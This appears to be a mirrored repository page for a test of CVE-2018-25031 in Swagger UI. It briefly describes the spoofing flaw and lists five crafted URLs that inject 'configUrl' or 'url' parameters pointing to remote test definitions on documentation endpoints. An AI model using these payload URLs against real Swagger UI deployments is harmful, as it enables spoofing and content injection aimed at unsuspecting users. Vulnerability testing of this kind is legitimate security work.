Giters

alamo21 / testswaggerxss

CVE-2018-25031 tests

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2018-25031

CVE-2018-25031 exploits tests

Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.

HowTo

Find the documentation endpoint and add the parameter "configUrl" pointing to test.json or "url" pointing to test.yaml.

https://exemple.com/?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json
https://exemple.com/?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui/index.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/api/swagger/index.html?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json

Screenshots

image

About

CVE-2018-25031 tests